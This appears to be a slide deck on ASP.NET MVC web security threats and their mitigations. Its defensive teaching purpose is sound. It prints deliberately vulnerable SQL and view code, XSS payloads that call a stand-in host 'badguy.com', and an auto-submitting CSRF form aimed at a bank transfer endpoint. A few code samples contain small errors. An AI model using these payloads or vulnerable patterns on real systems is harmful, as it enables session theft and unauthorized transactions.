Threats & Mitigation Brock Allen http://brockallen.com brockallen@gmail.com @BrockLAllen Objectives • Mitigate against common threats on the web – – – – – – – – – Lack of HTTPS SQL injection XSS, CSP CSRF clickjacking over/under posting cookieless session password guessing bots Eavesdropping and server spoofing/MITM • Threat: Communication on a public network – Attackers can intercept traffic and access secrets • Threat: How do you authenticate server – Do you trust the HTML and JavaScript in your page • Mitigation: TLS/SSL/HTTPS – Security provides • Confidentiality, Integrity, Authentication – Server authentication achieved via HTTPS • As well as confidentiality and integrity – Client authentication achieved via tokens • Typically in HTTP headers – MVC provides [RequireHttps] authorization filter Protocol relative URLs • Threat: • Mitigation: protocol relative URLs – Uses hosting page’s scheme <script src=“//server.com/scripts/js”></script> Secure cookies • Threat: Leaked cookies • Mitigation: use secure cookies – browser will not send cookie over non-SSL request public ActionResult Index() { var cookie = new HttpCookie("foo", "bar") { Secure=true }; Response.Cookies.Add(cookie); return View(); } HTTP Strict Transport Security (HSTS) • Threat: Non-SSL connections – MITM can redirect/take over connection • Mitigation: HSTS – Strict-Transport-Security HTTPS response header to indicate communication should only be over HTTPS – Cache value helps mitigate MITM attacks on initial non-SSL connection – Browsers contain pre-loaded list of HSTS sites HTTP/1.1 200 OK Content-Type:text/html Strict-Transport-Security: max-age=31536000; includeSubDomains Key Pinning • Threat: Compromised CAs and MITM cert spoofing • Mitigation: Key Pinning – – – – Servers provide whitelist of certificate(s) allowed in cert chain Browser “pins” server to specified certificate Future requests must use pinned certificate RFC7469: https://tools.ietf.org/html/rfc7469 HTTP/1.1 200 OK Content-Type:text/html Public-Key-Pins: max-age=2592000; pin-sha256="d6qzRu9zOECb90Uez27xWltNsj0e1Md7GkYYkVoZWmM="; pin-sha256="E9CZ9INDbd+2eRQozYqqbQ2yXLVKB9+xcprMF+44U1g="; SQL injection • Threat: untrusted input used as executable SQL statements – due to string concatenation public ActionResult UpdateAccount(int userID, string name) { var sql = "update users set name = '" + name + "' where userid = " + userID.ToString(); ExecuteSQL(sql); return View(); } SQL injection • Mitigation: validate untrusted input – validate input with RegEx • Mitigation: escape untrusted input – use parameterized SQL to escape input • not just stored procs • LINQ to SQL and EF automatically use parameters public ActionResult UpdateAccount(int userID, string name) { SqlCommand cmd = new SqlCommand(); cmd.CommandText = "update users set name = @name where userid = @id"; cmd.Parameters.AddWithValue("@name", name); cmd.Parameters.AddWithValue("@id", userID); ExecuteCommand(cmd); return View(); } Cross-site scripting attacks (XSS) • Threat: untrusted input used as rendered HTML – malicious user gets other user to execute malicious markup • provides access to attacked user's cookies – execute from data stored in database – execute from javascript embedded in URL public ActionResult ViewProduct(string productName) { ViewData["ProductName"] = productName; return View(); } <p> Product Name: <%= ViewData["ProductName"] %> </p> Script: <script src=“http://badguy.com/attack.js”></script> Scriptless: <img src=‘http://badguy.com? Cross-site scripting attacks (XSS) • Mitigation: Validate input – RegEx for malicious inputs (<script>, e.g.) • performed automatically – control with ValidateInputAttribute • mainly used to allow HTML to be posted (when necessary) – control with AllowHtml • used on properties of model class [ValidateInput(false)] public ActionResult UpdateProduct( string name, string description) { ViewData["ProductName"] = productName; return View(); } Cross-site scripting attacks (XSS) • Mitigation: HTML encode untrusted values – Razor view engine @expression automatically encodes – If using WebForms view engine syntax use: • Html.Encode • <%: some expression %> – Html helpers all encode data – must encode for other contexts • can use AntiXSS Encode APIs <p> @ViewData["ProductName"] </p> <p> <%= Html.Encode(ViewData["ProductName"]) %> </p> <p> <%: ViewData["ProductName"] %> </p> Content security policy (CSP) • Mitigation: Only allow content from trusted sources – Content-Security-Policy HTTP header whitelists sources • Also X-WebKit-CSP and X-Content-Security-Policy • Inline script is blocked – Keywords indicate common semantics • ‘*’ • ‘self’ • ‘none’ • https: • ‘unsafe-inline’ • *.foo.com HTTP/1.1 200 OK Content-Type:text/html Content-Security-Policy: script-src ‘self’ foo.com https://bar.com *.baz.com Content security policy (CSP) • CSP can be applied to many things – ; separated list in CSP header Directive Feature default-src Sets defaults for everything script-src JavaScript connect-src Origins allowed for Ajax, SSE, WebSockets style-src CSS img-src Images font-src Fonts object-src Objects (Flash) media-src Audio/Video frame-src Frames Cross-site scripting attacks (XSS) • Mitigation: use HTTP-only cookies – browser prevents JavaScript from accessing cookies • not supported in older browsers public ActionResult Index() { var cookie = new HttpCookie("foo", "bar") { HttpOnly=true }; Response.Cookies.Add(cookie); return View(); } Cross-site request forgery (CSRF/XSRF) • Threat: unauthorized commands sent while user logged in – – – – – user logs into bank website user opens another tab in browser to malicious site page from malicious site makes requests to bank website bank website executes requests since user is logged in requires timing on part of attacker • user must be logged in <form id='theform' action='http://bank.com/TransferFunds'> <input type='text' name='fromAccount' value='123' /> <input type='text' name='toAccount' value='789' /> </form> <script> theform.submit(); </script> Cross-site request forgery (CSRF/XSRF) • Mitigation: validate requests with cookie based token – upon login, issue cookie with random value – in every <form> add hidden field with same random value – compare in action method to validate request AntiForgeryToken • Html.AntiForgeryToken emits hidden input with token • ValidateAntiForgeryTokenAttribute validates token @using (Html.BeginForm("Transfer", "Bank")) { @Html.AntiForgeryToken() <p>From: @Html.TextBox("fromAccount")</p> <p>To: @Html.TextBox("toAccount")</p> <p><input type="submit" value="Transfer" /></p> } [ValidateAntiForgeryToken] public ActionResult Transfer(string fromAccount, string toAccount) { // ... } CSRF and Web API • Threat: Web API supports form-urlencoded media type formatter for POST data – Malicious page can POST a <form> to Web API endpoint and model binding will map request data to method parameters • Mitigation: disable form-urlencoded media type formatter – <form> elements can’t submit application/json – CORS prevents cross-origin Ajax calls • Mitigation: Simulate MVC’s AntiForgeryToken support – VS2012 SPA template used this approach – Painful for both client and server – Non-browser clients don’t want to use cookies anyway • Mitigation: Don’t use cookies for Web API – Use tokens, such as bearer tokens (obtained via OAuth2) Clickjacking (site redressing) • Threat: malicious site gets users to click invisible content – malicious site uses invisible <iframe> to load another site – user thinks they're clicking one thing, but really clicking content in <iframe> • Mitigation: frame busting or frame killing – JavaScript to prevent running in <iframe> <style>html { display : none; }</style> <script type="text/javascript"> if(top === self) { document.documentElement.style.display = 'block'; } </script> • Mitigation: X-Frame-Options HTTP header – DENY, SAMEORIGIN or ALLOW-FROM origin Over/under posting • Threat: Model binding blindly maps submitted values public class UserEntity { public string Name { get; set; } public bool IsAdmin { get; set; } } public ActionResult ViewUser(int id) { UserEntity viewModel = database.GetUser(id); return View(viewModel); } public ActionResult UpdateUser(UserModel model) { database.Update(model); // ... } Over/under posting • Mitigation: use [Bind] with Include or Exclude to indicate allowed values public ActionResult UpdateUser( [Bind(Include=“Name”)] UserEntity model) { // ... } • Mitigation: Use dedicated classes for input model public class UserInputModel { public string Name { get; set; } } Cookieless session/forms authentication • Threat: Putting sensitive tokens in URL/query string – User can share with others – Attacker can deliver in phishing attack http://localhost/(S(ul35xfac4xgeapihiswyd0d1))/default • Mitigation: Use cookies – ASP.NET session state is a bad idea anyway Password guessing • Threat: automated password guessing – against public login page • happened to twitter • Mitigation: require strong passwords – give users feedback on password strength • Mitigation: use two factor authentication – must use more than password to access site Password guessing • Mitigation: slow attacker down for failed attempts – record failed attempts – use Task.Delay(1000 * NumberOfFailedAttempts) • Mitigation: lock access after failed attempts – lock account after N failed attempts • opens up DoS-like attack on account – unlock account after X amount of time var user = await UserManager.FindByNameAsync(userName); if (await UserManager.IsLockedOutAsync(user.Id)) { return SignInStatus.LockedOut; } if (!await UserManager.CheckPasswordAsync(user, password)) { await UserManager.AccessFailedAsync(user.Id); return SignInStatus.LockedOut; } // ... Bots • Threat: Bots spamming web sites – automated software creating accounts, submitting data • Mitigation: CAPTCHA – Completely Automated Public Turing Test To Tell Computers and Humans Apart – http://www.captcha.net/ Summary • Security is hard • All input is evil • Audit everything (except sensitive data)
© Copyright 2024